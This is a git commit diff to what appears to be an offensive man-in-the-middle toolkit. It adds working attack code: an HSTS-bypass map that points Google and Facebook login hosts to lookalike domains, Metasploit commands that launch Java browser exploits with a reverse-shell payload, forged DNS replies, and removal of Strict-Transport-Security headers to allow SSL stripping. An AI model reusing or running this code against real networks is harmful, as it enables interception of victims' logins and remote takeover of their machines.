fixed error when loading the css of some websites when using the bypass-hsts option, added some better error handling on plugins

This commit is contained in:
byt3bl33d3r 2014-11-23 13:38:30 +01:00
parent 1c3e0554fd
commit e2132a6ca9
6 changed files with 42 additions and 20 deletions

View file

@ -1,7 +1,10 @@
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
www.facebook.com = social.facebook.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com

View file

@ -61,7 +61,7 @@ class BeefAutorun(Inject, Plugin):
already_hooked = []
while True:
sessions = beef.sessions_online()
if len(sessions) > 0:
if sessions is not None and len(sessions) > 0:
for session in sessions:
if session not in already_hooked:

View file

@ -142,10 +142,8 @@ class JavaPwn(BrowserProfiler, Plugin):
self.injectWait(msf, url, vic_ip)
else: #here we setup the exploit
rand_url = self.rand_url() #generate a random url
rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
rand_url = self.rand_url()
#generate the command string to send to the virtual console
#new line character very important as it simulates a user pressing enter
cmd = "use exploit/multi/browser/%s\n" % exploit
@ -165,10 +163,12 @@ class JavaPwn(BrowserProfiler, Plugin):
logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
logging.info("%s >> falling back to the signed applet attack" % vic_ip)
rand_url = self.rand_url()
cmd = "use exploit/multi/browser/java_signed_applet\n"
cmd += "set SRVPORT %s\n" % self.msfport
cmd += "set URIPATH %s\n" % rand_url
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter (plus its multi-platform! Yay java!)
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
cmd += "set LHOST %s\n" % self.msfip
cmd += "set LPORT %s\n" % rand_port
cmd += "exploit -j\n"

View file

@ -249,13 +249,14 @@ class Spoof(Plugin):
def resolve_domain(self, domain):
try:
#logging.info("Resolving -> %s" % domain)
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips[0]
return real_ips
except Exception:
logging.debug("Error resolving " + domain)
@ -266,6 +267,7 @@ class Spoof(Plugin):
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
#logging.info("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNSQR].qname:
@ -277,22 +279,33 @@ class Spoof(Plugin):
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip, hsts=True)
self.modify_dns(payload, pkt, ip)
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip, hsts=True)
self.modify_dns(payload, pkt, ip)
def modify_dns(self, payload, pkt, ip, hsts=False):
if 'web' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
if ip:
self.modify_dns(payload, pkt, ip)
def modify_dns(self, payload, pkt, ip):
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
if self.hsts:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
for i in ip:
spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
if hsts:
logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
else:
if self.dns:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
def start_dns_queue(self):
@ -343,8 +356,11 @@ class Spoof(Plugin):
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if (self.dns or self.hsts):
try:
self.q.unbind(socket.AF_INET)
self.q.close()
except:
pass
if self.arp:
print '[*] Re-arping network'

View file

@ -100,6 +100,9 @@ class ServerConnection(HTTPClient):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
if (key.lower() == 'strict-transport-security'):
value = 'max-age=0'
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):

View file

@ -71,7 +71,7 @@ class URLMonitor:
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
#logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))